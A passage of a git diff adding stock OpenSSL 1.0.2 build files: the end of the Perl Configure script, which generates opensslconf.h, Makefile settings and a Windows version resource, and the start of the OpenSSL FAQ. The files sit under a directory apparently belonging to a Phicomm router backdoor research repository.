+	s/^FIPSDIR=.*/FIPSDIR=$fipsdir/;
+	s/^FIPSLIBDIR=.*/FIPSLIBDIR=$fipslibdir/;
+	s/^FIPSCANLIB=.*/FIPSCANLIB=libcrypto/ if $fips;
+	s/^BASEADDR=.*/BASEADDR=$baseaddr/;
+
+	s/^SHLIB_TARGET=.*/SHLIB_TARGET=$shared_target/;
+	s/^SHLIB_MARK=.*/SHLIB_MARK=$shared_mark/;
+	s/^SHARED_LIBS=.*/SHARED_LIBS=\$(SHARED_CRYPTO) \$(SHARED_SSL)/ if (!$no_shared);
+	if ($shared_extension ne "" && $shared_extension =~ /^\.s([ol])\.[^\.]*$/)
+		{
+		my $sotmp = $1;
+		s/^SHARED_LIBS_LINK_EXTS=.*/SHARED_LIBS_LINK_EXTS=.s$sotmp/;
+		}
+	elsif ($shared_extension ne "" && $shared_extension =~ /^\.[^\.]*\.dylib$/)
+		{
+		s/^SHARED_LIBS_LINK_EXTS=.*/SHARED_LIBS_LINK_EXTS=.dylib/;
+		}
+	elsif ($shared_extension ne "" && $shared_extension =~ /^\.s([ol])\.[^\.]*\.[^\.]*$/)
+		{
+		my $sotmp = $1;
+		s/^SHARED_LIBS_LINK_EXTS=.*/SHARED_LIBS_LINK_EXTS=.s$sotmp.\$(SHLIB_MAJOR) .s$sotmp/;
+		}
+	elsif ($shared_extension ne "" && $shared_extension =~ /^\.[^\.]*\.[^\.]*\.dylib$/)
+		{
+		s/^SHARED_LIBS_LINK_EXTS=.*/SHARED_LIBS_LINK_EXTS=.\$(SHLIB_MAJOR).dylib .dylib/;
+		}
+	s/^SHARED_LDFLAGS=.*/SHARED_LDFLAGS=$shared_ldflag/;
+	print OUT $_."\n";
+	}
+close(IN);
+close(OUT);
+rename($Makefile,"$Makefile.bak") || die "unable to rename $Makefile\n" if -e $Makefile;
+rename("$Makefile.new",$Makefile) || die "unable to rename $Makefile.new\n";
+
+print "CC            =$cc\n";
+print "CFLAG         =$cflags\n";
+print "EX_LIBS       =$lflags\n";
+print "CPUID_OBJ     =$cpuid_obj\n";
+print "BN_ASM        =$bn_obj\n";
+print "EC_ASM        =$ec_obj\n";
+print "DES_ENC       =$des_obj\n";
+print "AES_ENC       =$aes_obj\n";
+print "BF_ENC        =$bf_obj\n";
+print "CAST_ENC      =$cast_obj\n";
+print "RC4_ENC       =$rc4_obj\n";
+print "RC5_ENC       =$rc5_obj\n";
+print "MD5_OBJ_ASM   =$md5_obj\n";
+print "SHA1_OBJ_ASM  =$sha1_obj\n";
+print "RMD160_OBJ_ASM=$rmd160_obj\n";
+print "CMLL_ENC      =$cmll_obj\n";
+print "MODES_OBJ     =$modes_obj\n";
+print "ENGINES_OBJ   =$engines_obj\n";
+print "PROCESSOR     =$processor\n";
+print "RANLIB        =$ranlib\n";
+print "ARFLAGS       =$arflags\n";
+print "PERL          =$perl\n";
+print "KRB5_INCLUDES =",$withargs{"krb5-include"},"\n"
+	if $withargs{"krb5-include"} ne "";
+
+my $des_ptr=0;
+my $des_risc1=0;
+my $des_risc2=0;
+my $des_unroll=0;
+my $bn_ll=0;
+my $def_int=2;
+my $rc4_int=$def_int;
+my $md2_int=$def_int;
+my $idea_int=$def_int;
+my $rc2_int=$def_int;
+my $rc4_idx=0;
+my $rc4_chunk=0;
+my $bf_ptr=0;
+my @type=("char","short","int","long");
+my ($b64l,$b64,$b32,$b16,$b8)=(0,0,1,0,0);
+my $export_var_as_fn=0;
+
+my $des_int;
+
+foreach (sort split(/\s+/,$bn_ops))
+	{
+	$des_ptr=1 if /DES_PTR/;
+	$des_risc1=1 if /DES_RISC1/;
+	$des_risc2=1 if /DES_RISC2/;
+	$des_unroll=1 if /DES_UNROLL/;
+	$des_int=1 if /DES_INT/;
+	$bn_ll=1 if /BN_LLONG/;
+	$rc4_int=0 if /RC4_CHAR/;
+	$rc4_int=3 if /RC4_LONG/;
+	$rc4_idx=1 if /RC4_INDEX/;
+	$rc4_chunk=1 if /RC4_CHUNK/;
+	$rc4_chunk=2 if /RC4_CHUNK_LL/;
+	$md2_int=0 if /MD2_CHAR/;
+	$md2_int=3 if /MD2_LONG/;
+	$idea_int=1 if /IDEA_SHORT/;
+	$idea_int=3 if /IDEA_LONG/;
+	$rc2_int=1 if /RC2_SHORT/;
+	$rc2_int=3 if /RC2_LONG/;
+	$bf_ptr=1 if $_ eq "BF_PTR";
+	$bf_ptr=2 if $_ eq "BF_PTR2";
+	($b64l,$b64,$b32,$b16,$b8)=(0,1,0,0,0) if /SIXTY_FOUR_BIT/;
+	($b64l,$b64,$b32,$b16,$b8)=(1,0,0,0,0) if /SIXTY_FOUR_BIT_LONG/;
+	($b64l,$b64,$b32,$b16,$b8)=(0,0,1,0,0) if /THIRTY_TWO_BIT/;
+	($b64l,$b64,$b32,$b16,$b8)=(0,0,0,1,0) if /SIXTEEN_BIT/;
+	($b64l,$b64,$b32,$b16,$b8)=(0,0,0,0,1) if /EIGHT_BIT/;
+	$export_var_as_fn=1 if /EXPORT_VAR_AS_FN/;
+	}
+
+open(IN,'<crypto/opensslconf.h.in') || die "unable to read crypto/opensslconf.h.in:$!\n";
+unlink("crypto/opensslconf.h.new") || die "unable to remove old crypto/opensslconf.h.new:$!\n" if -e "crypto/opensslconf.h.new";
+open(OUT,'>crypto/opensslconf.h.new') || die "unable to create crypto/opensslconf.h.new:$!\n";
+print OUT "/* opensslconf.h */\n";
+print OUT "/* WARNING: Generated automatically from opensslconf.h.in by Configure. */\n\n";
+
+print OUT "#ifdef  __cplusplus\n";
+print OUT "extern \"C\" {\n";
+print OUT "#endif\n";
+print OUT "/* OpenSSL was configured with the following options: */\n";
+my $openssl_algorithm_defines_trans = $openssl_algorithm_defines;
+$openssl_experimental_defines =~ s/^\s*#\s*define\s+OPENSSL_NO_(.*)/#ifndef OPENSSL_EXPERIMENTAL_$1\n# ifndef OPENSSL_NO_$1\n#  define OPENSSL_NO_$1\n# endif\n#endif/mg;
+$openssl_algorithm_defines_trans =~ s/^\s*#\s*define\s+OPENSSL_(.*)/# if defined(OPENSSL_$1) \&\& !defined($1)\n#  define $1\n# endif/mg;
+$openssl_algorithm_defines =~ s/^\s*#\s*define\s+(.*)/#ifndef $1\n# define $1\n#endif/mg;
+$openssl_algorithm_defines = "   /* no ciphers excluded */\n" if $openssl_algorithm_defines eq "";
+$openssl_thread_defines =~ s/^\s*#\s*define\s+(.*)/#ifndef $1\n# define $1\n#endif/mg;
+$openssl_sys_defines =~ s/^\s*#\s*define\s+(.*)/#ifndef $1\n# define $1\n#endif/mg;
+$openssl_other_defines =~ s/^\s*#\s*define\s+(.*)/#ifndef $1\n# define $1\n#endif/mg;
+print OUT $openssl_sys_defines;
+print OUT "#ifndef OPENSSL_DOING_MAKEDEPEND\n\n";
+print OUT $openssl_experimental_defines;
+print OUT "\n";
+print OUT $openssl_algorithm_defines;
+print OUT "\n#endif /* OPENSSL_DOING_MAKEDEPEND */\n\n";
+print OUT $openssl_thread_defines;
+print OUT $openssl_other_defines,"\n";
+
+print OUT "/* The OPENSSL_NO_* macros are also defined as NO_* if the application\n";
+print OUT "   asks for it.  This is a transient feature that is provided for those\n";
+print OUT "   who haven't had the time to do the appropriate changes in their\n";
+print OUT "   applications.  */\n";
+print OUT "#ifdef OPENSSL_ALGORITHM_DEFINES\n";
+print OUT $openssl_algorithm_defines_trans;
+print OUT "#endif\n\n";
+
+print OUT "#define OPENSSL_CPUID_OBJ\n\n" if ($cpuid_obj ne "mem_clr.o");
+
+while (<IN>)
+	{
+	if	(/^#define\s+OPENSSLDIR/)
+		{
+		my $foo = $openssldir;
+		$foo =~ s/\\/\\\\/g;
+		print OUT "#define OPENSSLDIR \"$foo\"\n";
+		}
+	elsif	(/^#define\s+ENGINESDIR/)
+		{
+		my $foo = "$prefix/$libdir/engines";
+		$foo =~ s/\\/\\\\/g;
+		print OUT "#define ENGINESDIR \"$foo\"\n";
+		}
+	elsif	(/^#((define)|(undef))\s+OPENSSL_EXPORT_VAR_AS_FUNCTION/)
+		{ printf OUT "#undef OPENSSL_EXPORT_VAR_AS_FUNCTION\n"
+			if $export_var_as_fn;
+		  printf OUT "#%s OPENSSL_EXPORT_VAR_AS_FUNCTION\n",
+			($export_var_as_fn)?"define":"undef"; }
+	elsif	(/^#define\s+OPENSSL_UNISTD/)
+		{
+		$unistd = "<unistd.h>" if $unistd eq "";
+		print OUT "#define OPENSSL_UNISTD $unistd\n";
+		}
+	elsif	(/^#((define)|(undef))\s+SIXTY_FOUR_BIT_LONG/)
+		{ printf OUT "#%s SIXTY_FOUR_BIT_LONG\n",($b64l)?"define":"undef"; }
+	elsif	(/^#((define)|(undef))\s+SIXTY_FOUR_BIT/)
+		{ printf OUT "#%s SIXTY_FOUR_BIT\n",($b64)?"define":"undef"; }
+	elsif	(/^#((define)|(undef))\s+THIRTY_TWO_BIT/)
+		{ printf OUT "#%s THIRTY_TWO_BIT\n",($b32)?"define":"undef"; }
+	elsif	(/^#((define)|(undef))\s+SIXTEEN_BIT/)
+		{ printf OUT "#%s SIXTEEN_BIT\n",($b16)?"define":"undef"; }
+	elsif	(/^#((define)|(undef))\s+EIGHT_BIT/)
+		{ printf OUT "#%s EIGHT_BIT\n",($b8)?"define":"undef"; }
+	elsif	(/^#((define)|(undef))\s+BN_LLONG\s*$/)
+		{ printf OUT "#%s BN_LLONG\n",($bn_ll)?"define":"undef"; }
+	elsif	(/^\#define\s+DES_LONG\s+.*/)
+		{ printf OUT "#define DES_LONG unsigned %s\n",
+			($des_int)?'int':'long'; }
+	elsif	(/^\#(define|undef)\s+DES_PTR/)
+		{ printf OUT "#%s DES_PTR\n",($des_ptr)?'define':'undef'; }
+	elsif	(/^\#(define|undef)\s+DES_RISC1/)
+		{ printf OUT "#%s DES_RISC1\n",($des_risc1)?'define':'undef'; }
+	elsif	(/^\#(define|undef)\s+DES_RISC2/)
+		{ printf OUT "#%s DES_RISC2\n",($des_risc2)?'define':'undef'; }
+	elsif	(/^\#(define|undef)\s+DES_UNROLL/)
+		{ printf OUT "#%s DES_UNROLL\n",($des_unroll)?'define':'undef'; }
+	elsif	(/^#define\s+RC4_INT\s/)
+		{ printf OUT "#define RC4_INT unsigned %s\n",$type[$rc4_int]; }
+	elsif	(/^#undef\s+RC4_CHUNK/)
+		{
+		printf OUT "#undef RC4_CHUNK\n" if $rc4_chunk==0;
+		printf OUT "#define RC4_CHUNK unsigned long\n" if $rc4_chunk==1;
+		printf OUT "#define RC4_CHUNK unsigned long long\n" if $rc4_chunk==2;
+		}
+	elsif	(/^#((define)|(undef))\s+RC4_INDEX/)
+		{ printf OUT "#%s RC4_INDEX\n",($rc4_idx)?"define":"undef"; }
+	elsif (/^#(define|undef)\s+I386_ONLY/)
+		{ printf OUT "#%s I386_ONLY\n", ($processor eq "386")?
+			"define":"undef"; }
+	elsif	(/^#define\s+MD2_INT\s/)
+		{ printf OUT "#define MD2_INT unsigned %s\n",$type[$md2_int]; }
+	elsif	(/^#define\s+IDEA_INT\s/)
+		{printf OUT "#define IDEA_INT unsigned %s\n",$type[$idea_int];}
+	elsif	(/^#define\s+RC2_INT\s/)
+		{printf OUT "#define RC2_INT unsigned %s\n",$type[$rc2_int];}
+	elsif (/^#(define|undef)\s+BF_PTR/)
+		{
+		printf OUT "#undef BF_PTR\n" if $bf_ptr == 0;
+		printf OUT "#define BF_PTR\n" if $bf_ptr == 1;
+		printf OUT "#define BF_PTR2\n" if $bf_ptr == 2;
+	        }
+	else
+		{ print OUT $_; }
+	}
+close(IN);
+print OUT "#ifdef  __cplusplus\n";
+print OUT "}\n";
+print OUT "#endif\n";
+close(OUT);
+rename("crypto/opensslconf.h","crypto/opensslconf.h.bak") || die "unable to rename crypto/opensslconf.h\n" if -e "crypto/opensslconf.h";
+rename("crypto/opensslconf.h.new","crypto/opensslconf.h") || die "unable to rename crypto/opensslconf.h.new\n";
+
+
+# Fix the date
+
+print "SIXTY_FOUR_BIT_LONG mode\n" if $b64l;
+print "SIXTY_FOUR_BIT mode\n" if $b64;
+print "THIRTY_TWO_BIT mode\n" if $b32;
+print "SIXTEEN_BIT mode\n" if $b16;
+print "EIGHT_BIT mode\n" if $b8;
+print "DES_PTR used\n" if $des_ptr;
+print "DES_RISC1 used\n" if $des_risc1;
+print "DES_RISC2 used\n" if $des_risc2;
+print "DES_UNROLL used\n" if $des_unroll;
+print "DES_INT used\n" if $des_int;
+print "BN_LLONG mode\n" if $bn_ll;
+print "RC4 uses u$type[$rc4_int]\n" if $rc4_int != $def_int;
+print "RC4_INDEX mode\n" if $rc4_idx;
+print "RC4_CHUNK is undefined\n" if $rc4_chunk==0;
+print "RC4_CHUNK is unsigned long\n" if $rc4_chunk==1;
+print "RC4_CHUNK is unsigned long long\n" if $rc4_chunk==2;
+print "MD2 uses u$type[$md2_int]\n" if $md2_int != $def_int;
+print "IDEA uses u$type[$idea_int]\n" if $idea_int != $def_int;
+print "RC2 uses u$type[$rc2_int]\n" if $rc2_int != $def_int;
+print "BF_PTR used\n" if $bf_ptr == 1; 
+print "BF_PTR2 used\n" if $bf_ptr == 2; 
+
+if($IsMK1MF) {
+	open (OUT,">crypto/buildinf.h") || die "Can't open buildinf.h";
+	printf OUT <<EOF;
+#ifndef MK1MF_BUILD
+  /* auto-generated by Configure for crypto/cversion.c:
+   * for Unix builds, crypto/Makefile.ssl generates functional definitions;
+   * Windows builds (and other mk1mf builds) compile cversion.c with
+   * -DMK1MF_BUILD and use definitions added to this file by util/mk1mf.pl. */
+  #error "Windows builds (PLATFORM=$target) use mk1mf.pl-created Makefiles"
+#endif
+EOF
+	close(OUT);
+} else {
+	my $make_command = "$make PERL=\'$perl\'";
+	my $make_targets = "";
+	$make_targets .= " links" if $symlink;
+	$make_targets .= " depend" if $depflags ne $default_depflags && $make_depend;
+	$make_targets .= " gentests" if $symlink;
+	(system $make_command.$make_targets) == 0 or exit $?
+		if $make_targets ne "";
+	if ( $perl =~ m@^/@) {
+	    &dofile("tools/c_rehash",$perl,'^#!/', '#!%s','^my \$dir;$', 'my $dir = "' . $openssldir . '";', '^my \$prefix;$', 'my $prefix = "' . $prefix . '";');
+	    &dofile("apps/CA.pl",$perl,'^#!/', '#!%s');
+	} else {
+	    # No path for Perl known ...
+	    &dofile("tools/c_rehash",'/usr/local/bin/perl','^#!/', '#!%s','^my \$dir;$', 'my $dir = "' . $openssldir . '";',  '^my \$prefix;$', 'my $prefix = "' . $prefix . '";');
+	    &dofile("apps/CA.pl",'/usr/local/bin/perl','^#!/', '#!%s');
+	}
+	if ($depflags ne $default_depflags && !$make_depend) {
+		print <<EOF;
+
+Since you've disabled or enabled at least one algorithm, you need to do
+the following before building:
+
+	make depend
+EOF
+	}
+}
+
+# create the ms/version32.rc file if needed
+if ($IsMK1MF && ($target !~ /^netware/)) {
+	my ($v1, $v2, $v3, $v4);
+	if ($version_num =~ /(^[0-9a-f]{1})([0-9a-f]{2})([0-9a-f]{2})([0-9a-f]{2})/i) {
+		$v1=hex $1;
+		$v2=hex $2;
+		$v3=hex $3;
+		$v4=hex $4;
+	}
+	open (OUT,">ms/version32.rc") || die "Can't open ms/version32.rc";
+	print OUT <<EOF;
+#include <winver.h>
+
+LANGUAGE 0x09,0x01
+
+1 VERSIONINFO
+  FILEVERSION $v1,$v2,$v3,$v4
+  PRODUCTVERSION $v1,$v2,$v3,$v4
+  FILEFLAGSMASK 0x3fL
+#ifdef _DEBUG
+  FILEFLAGS 0x01L
+#else
+  FILEFLAGS 0x00L
+#endif
+  FILEOS VOS__WINDOWS32
+  FILETYPE VFT_DLL
+  FILESUBTYPE 0x0L
+BEGIN
+    BLOCK "StringFileInfo"
+    BEGIN
+	BLOCK "040904b0"
+	BEGIN
+	    // Required:	    
+	    VALUE "CompanyName", "The OpenSSL Project, http://www.openssl.org/\\0"
+	    VALUE "FileDescription", "OpenSSL Shared Library\\0"
+	    VALUE "FileVersion", "$version\\0"
+#if defined(CRYPTO)
+	    VALUE "InternalName", "libeay32\\0"
+	    VALUE "OriginalFilename", "libeay32.dll\\0"
+#elif defined(SSL)
+	    VALUE "InternalName", "ssleay32\\0"
+	    VALUE "OriginalFilename", "ssleay32.dll\\0"
+#endif
+	    VALUE "ProductName", "The OpenSSL Toolkit\\0"
+	    VALUE "ProductVersion", "$version\\0"
+	    // Optional:
+	    //VALUE "Comments", "\\0"
+	    VALUE "LegalCopyright", "Copyright  © 1998-2005 The OpenSSL Project. Copyright © 1995-1998 Eric A. Young, Tim J. Hudson. All rights reserved.\\0"
+	    //VALUE "LegalTrademarks", "\\0"
+	    //VALUE "PrivateBuild", "\\0"
+	    //VALUE "SpecialBuild", "\\0"
+	END
+    END
+    BLOCK "VarFileInfo"
+    BEGIN
+        VALUE "Translation", 0x409, 0x4b0
+    END
+END
+EOF
+	close(OUT);
+  }
+  
+print <<EOF;
+
+Configured for $target.
+EOF
+
+print <<\EOF if (!$no_threads && !$threads);
+
+The library could not be configured for supporting multi-threaded
+applications as the compiler options required on this system are not known.
+See file INSTALL for details if you need multi-threading.
+EOF
+
+print <<\EOF if ($no_shared_warn);
+
+You gave the option 'shared'.  Normally, that would give you shared libraries.
+Unfortunately, the OpenSSL configuration doesn't include shared library support
+for this platform yet, so it will pretend you gave the option 'no-shared'.  If
+you can inform the developpers (openssl-dev\@openssl.org) how to support shared
+libraries on this platform, they will at least look at it and try their best
+(but please first make sure you have tried with a current version of OpenSSL).
+EOF
+
+exit(0);
+
+sub usage
+	{
+	print STDERR $usage;
+	print STDERR "\npick os/compiler from:\n";
+	my $j=0;
+	my $i;
+        my $k=0;
+	foreach $i (sort keys %table)
+		{
+		next if $i =~ /^debug/;
+		$k += length($i) + 1;
+		if ($k > 78)
+			{
+			print STDERR "\n";
+			$k=length($i);
+			}
+		print STDERR $i . " ";
+		}
+	foreach $i (sort keys %table)
+		{
+		next if $i !~ /^debug/;
+		$k += length($i) + 1;
+		if ($k > 78)
+			{
+			print STDERR "\n";
+			$k=length($i);
+			}
+		print STDERR $i . " ";
+		}
+	print STDERR "\n\nNOTE: If in doubt, on Unix-ish systems use './config'.\n";
+	exit(1);
+	}
+
+sub which
+	{
+	my($name)=@_;
+	my $path;
+	foreach $path (split /:/, $ENV{PATH})
+		{
+		if (-f "$path/$name$exe_ext" and -x _)
+			{
+			return "$path/$name$exe_ext" unless ($name eq "perl" and
+			 system("$path/$name$exe_ext -e " . '\'exit($]<5.0);\''));
+			}
+		}
+	}
+
+sub dofile
+	{
+	my $f; my $p; my %m; my @a; my $k; my $ff;
+	($f,$p,%m)=@_;
+
+	open(IN,"<$f.in") || open(IN,"<$f") || die "unable to open $f:$!\n";
+	@a=<IN>;
+	close(IN);
+	foreach $k (keys %m)
+		{
+		grep(/$k/ && ($_=sprintf($m{$k}."\n",$p)),@a);
+		}
+	open(OUT,">$f.new") || die "unable to open $f.new:$!\n";
+	print OUT @a;
+	close(OUT);
+	rename($f,"$f.bak") || die "unable to rename $f\n" if -e $f;
+	rename("$f.new",$f) || die "unable to rename $f.new\n";
+	}
+
+sub print_table_entry
+	{
+	my $target = shift;
+
+	my ($cc, $cflags, $unistd, $thread_cflag, $sys_id, $lflags,
+	    $bn_ops, $cpuid_obj, $bn_obj, $ec_obj, $des_obj, $aes_obj, $bf_obj,
+	    $md5_obj, $sha1_obj, $cast_obj, $rc4_obj, $rmd160_obj,
+	    $rc5_obj, $wp_obj, $cmll_obj, $modes_obj, $engines_obj,
+	    $perlasm_scheme, $dso_scheme, $shared_target, $shared_cflag,
+	    $shared_ldflag, $shared_extension, $ranlib, $arflags, $multilib)=
+	split(/\s*:\s*/,$table{$target} . ":" x 30 , -1);
+			
+	print <<EOF
+
+*** $target
+\$cc           = $cc
+\$cflags       = $cflags
+\$unistd       = $unistd
+\$thread_cflag = $thread_cflag
+\$sys_id       = $sys_id
+\$lflags       = $lflags
+\$bn_ops       = $bn_ops
+\$cpuid_obj    = $cpuid_obj
+\$bn_obj       = $bn_obj
+\$ec_obj       = $ec_obj
+\$des_obj      = $des_obj
+\$aes_obj      = $aes_obj
+\$bf_obj       = $bf_obj
+\$md5_obj      = $md5_obj
+\$sha1_obj     = $sha1_obj
+\$cast_obj     = $cast_obj
+\$rc4_obj      = $rc4_obj
+\$rmd160_obj   = $rmd160_obj
+\$rc5_obj      = $rc5_obj
+\$wp_obj       = $wp_obj
+\$cmll_obj     = $cmll_obj
+\$modes_obj    = $modes_obj
+\$engines_obj  = $engines_obj
+\$perlasm_scheme = $perlasm_scheme
+\$dso_scheme   = $dso_scheme
+\$shared_target= $shared_target
+\$shared_cflag = $shared_cflag
+\$shared_ldflag = $shared_ldflag
+\$shared_extension = $shared_extension
+\$ranlib       = $ranlib
+\$arflags      = $arflags
+\$multilib     = $multilib
+EOF
+	}
+
+sub test_sanity
+	{
+	my $errorcnt = 0;
+
+	print STDERR "=" x 70, "\n";
+	print STDERR "=== SANITY TESTING!\n";
+	print STDERR "=== No configuration will be done, all other arguments will be ignored!\n";
+	print STDERR "=" x 70, "\n";
+
+	foreach $target (sort keys %table)
+		{
+		@fields = split(/\s*:\s*/,$table{$target} . ":" x 30 , -1);
+
+		if ($fields[$idx_dso_scheme-1] =~ /^(beos|dl|dlfcn|win32|vms)$/)
+			{
+			$errorcnt++;
+			print STDERR "SANITY ERROR: '$target' has the dso_scheme [$idx_dso_scheme] values\n";
+			print STDERR "              in the previous field\n";
+			}
+		elsif ($fields[$idx_dso_scheme+1] =~ /^(beos|dl|dlfcn|win32|vms)$/)
+			{
+			$errorcnt++;
+			print STDERR "SANITY ERROR: '$target' has the dso_scheme [$idx_dso_scheme] values\n";
+			print STDERR "              in the following field\n";
+			}
+		elsif ($fields[$idx_dso_scheme] !~ /^(beos|dl|dlfcn|win32|vms|)$/)
+			{
+			$errorcnt++;
+			print STDERR "SANITY ERROR: '$target' has the dso_scheme [$idx_dso_scheme] field = ",$fields[$idx_dso_scheme],"\n";
+			print STDERR "              valid values are 'beos', 'dl', 'dlfcn', 'win32' and 'vms'\n";
+			}
+		}
+	print STDERR "No sanity errors detected!\n" if $errorcnt == 0;
+	return $errorcnt;
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/FAQ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/FAQ
new file mode 100644
index 0000000..3be8310
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/FAQ
@@ -0,0 +1,1053 @@
+OpenSSL  -  Frequently Asked Questions
+--------------------------------------
+
+[MISC] Miscellaneous questions
+
+* Which is the current version of OpenSSL?
+* Where is the documentation?
+* How can I contact the OpenSSL developers?
+* Where can I get a compiled version of OpenSSL?
+* Why aren't tools like 'autoconf' and 'libtool' used?
+* What is an 'engine' version?
+* How do I check the authenticity of the OpenSSL distribution?
+* How does the versioning scheme work?
+
+[LEGAL] Legal questions
+
+* Do I need patent licenses to use OpenSSL?
+* Can I use OpenSSL with GPL software? 
+
+[USER] Questions on using the OpenSSL applications
+
+* Why do I get a "PRNG not seeded" error message?
+* Why do I get an "unable to write 'random state'" error message?
+* How do I create certificates or certificate requests?
+* Why can't I create certificate requests?
+* Why does <SSL program> fail with a certificate verify error?
+* Why can I only use weak ciphers when I connect to a server using OpenSSL?
+* How can I create DSA certificates?
+* Why can't I make an SSL connection using a DSA certificate?
+* How can I remove the passphrase on a private key?
+* Why can't I use OpenSSL certificates with SSL client authentication?
+* Why does my browser give a warning about a mismatched hostname?
+* How do I install a CA certificate into a browser?
+* Why is OpenSSL x509 DN output not conformant to RFC2253?
+* What is a "128 bit certificate"? Can I create one with OpenSSL?
+* Why does OpenSSL set the authority key identifier extension incorrectly?
+* How can I set up a bundle of commercial root CA certificates?
+
+[BUILD] Questions about building and testing OpenSSL
+
+* Why does the linker complain about undefined symbols?
+* Why does the OpenSSL test fail with "bc: command not found"?
+* Why does the OpenSSL test fail with "bc: 1 no implemented"?
+* Why does the OpenSSL test fail with "bc: stack empty"?
+* Why does the OpenSSL compilation fail on Alpha Tru64 Unix?
+* Why does the OpenSSL compilation fail with "ar: command not found"?
+* Why does the OpenSSL compilation fail on Win32 with VC++?
+* What is special about OpenSSL on Redhat?
+* Why does the OpenSSL compilation fail on MacOS X?
+* Why does the OpenSSL test suite fail on MacOS X?
+* Why does the OpenSSL test suite fail in BN_sqr test [on a 64-bit platform]?
+* Why does OpenBSD-i386 build fail on des-586.s with "Unimplemented segment type"?
+* Why does the OpenSSL test suite fail in sha512t on x86 CPU?
+* Why does compiler fail to compile sha512.c?
+* Test suite still fails, what to do?
+* I think I've found a bug, what should I do?
+* I'm SURE I've found a bug, how do I report it?
+* I've found a security issue, how do I report it?
+
+[PROG] Questions about programming with OpenSSL
+
+* Is OpenSSL thread-safe?
+* I've compiled a program under Windows and it crashes: why?
+* How do I read or write a DER encoded buffer using the ASN1 functions?
+* OpenSSL uses DER but I need BER format: does OpenSSL support BER?
+* I've tried using <M_some_evil_pkcs12_macro> and I get errors why?
+* I've called <some function> and it fails, why?
+* I just get a load of numbers for the error output, what do they mean?
+* Why do I get errors about unknown algorithms?
+* Why can't the OpenSSH configure script detect OpenSSL?
+* Can I use OpenSSL's SSL library with non-blocking I/O?
+* Why doesn't my server application receive a client certificate?
+* Why does compilation fail due to an undefined symbol NID_uniqueIdentifier?
+* I think I've detected a memory leak, is this a bug?
+* Why does Valgrind complain about the use of uninitialized data?
+* Why doesn't a memory BIO work when a file does?
+* Where are the declarations and implementations of d2i_X509() etc?
+
+===============================================================================
+
+[MISC] ========================================================================
+
+* Which is the current version of OpenSSL?
+
+The current version is available from <URL: http://www.openssl.org>.
+OpenSSL 1.0.1a was released on Apr 19th, 2012.
+
+In addition to the current stable release, you can also access daily
+snapshots of the OpenSSL development version at <URL:
+ftp://ftp.openssl.org/snapshot/>, or get it by anonymous Git access.
+
+
+* Where is the documentation?
+
+OpenSSL is a library that provides cryptographic functionality to
+applications such as secure web servers.  Be sure to read the
+documentation of the application you want to use.  The INSTALL file
+explains how to install this library.
+
+OpenSSL includes a command line utility that can be used to perform a
+variety of cryptographic functions.  It is described in the openssl(1)
+manpage.  Documentation for developers is currently being written. Many
+manual pages are available; overviews over libcrypto and
+libssl are given in the crypto(3) and ssl(3) manpages.
+
+The OpenSSL manpages are installed in /usr/local/ssl/man/ (or a
+different directory if you specified one as described in INSTALL).
+In addition, you can read the most current versions at
+<URL: http://www.openssl.org/docs/>. Note that the online documents refer
+to the very latest development versions of OpenSSL and may include features
+not present in released versions. If in doubt refer to the documentation
+that came with the version of OpenSSL you are using. The pod format
+documentation is included in each OpenSSL distribution under the docs
+directory.
+
+There is some documentation about certificate extensions and PKCS#12
+in doc/openssl.txt
+
+The original SSLeay documentation is included in OpenSSL as
+doc/ssleay.txt.  It may be useful when none of the other resources
+help, but please note that it reflects the obsolete version SSLeay
+0.6.6.
+
+
+* How can I contact the OpenSSL developers?
+
+The README file describes how to submit bug reports and patches to
+OpenSSL.  Information on the OpenSSL mailing lists is available from
+<URL: http://www.openssl.org>.
+
+
+* Where can I get a compiled version of OpenSSL?
+
+You can finder pointers to binary distributions in
+<URL: http://www.openssl.org/related/binaries.html> .
+
+Some applications that use OpenSSL are distributed in binary form.
+When using such an application, you don't need to install OpenSSL
+yourself; the application will include the required parts (e.g. DLLs).
+
+If you want to build OpenSSL on a Windows system and you don't have
+a C compiler, read the "Mingw32" section of INSTALL.W32 for information
+on how to obtain and install the free GNU C compiler.
+
+A number of Linux and *BSD distributions include OpenSSL.
+
+
+* Why aren't tools like 'autoconf' and 'libtool' used?
+
+autoconf will probably be used in future OpenSSL versions. If it was
+less Unix-centric, it might have been used much earlier.
+
+* What is an 'engine' version?
+
+With version 0.9.6 OpenSSL was extended to interface to external crypto
+hardware. This was realized in a special release '0.9.6-engine'. With
+version 0.9.7 the changes were merged into the main development line,
+so that the special release is no longer necessary.
+
+* How do I check the authenticity of the OpenSSL distribution?
+
+We provide MD5 digests and ASC signatures of each tarball.
+Use MD5 to check that a tarball from a mirror site is identical:
+
+   md5sum TARBALL | awk '{print $1;}' | cmp - TARBALL.md5
+
+You can check authenticity using pgp or gpg. You need the OpenSSL team
+member public key used to sign it (download it from a key server, see a
+list of keys at <URL: http://www.openssl.org/about/>). Then
+just do:
+
+   pgp TARBALL.asc
+
+* How does the versioning scheme work?
+
+After the release of OpenSSL 1.0.0 the versioning scheme changed. Letter 
+releases (e.g. 1.0.1a) can only contain bug and security fixes and no
+new features. Minor releases change the last number (e.g. 1.0.2) and 
+can contain new features that retain binary compatibility. Changes to
+the middle number are considered major releases and neither source nor
+binary compatibility is guaranteed.
+
+Therefore the answer to the common question "when will feature X be
+backported to OpenSSL 1.0.0/0.9.8?" is "never" but it could appear
+in the next minor release.
+
+* What happens when the letter release reaches z?
+
+It was decided after the release of OpenSSL 0.9.8y the next version should
+be 0.9.8za then 0.9.8zb and so on.
+
+
+[LEGAL] =======================================================================
+
+* Do I need patent licenses to use OpenSSL?
+
+For information on intellectual property rights, please consult a lawyer.
+The OpenSSL team does not offer legal advice.
+
+You can configure OpenSSL so as not to use IDEA, MDC2 and RC5 by using
+ ./config no-idea no-mdc2 no-rc5
+
+
+* Can I use OpenSSL with GPL software?
+
+On many systems including the major Linux and BSD distributions, yes (the
+GPL does not place restrictions on using libraries that are part of the
+normal operating system distribution).
+
+On other systems, the situation is less clear. Some GPL software copyright
+holders claim that you infringe on their rights if you use OpenSSL with
+their software on operating systems that don't normally include OpenSSL.
+
+If you develop open source software that uses OpenSSL, you may find it
+useful to choose an other license than the GPL, or state explicitly that
+"This program is released under the GPL with the additional exemption that
+compiling, linking, and/or using OpenSSL is allowed."  If you are using
+GPL software developed by others, you may want to ask the copyright holder
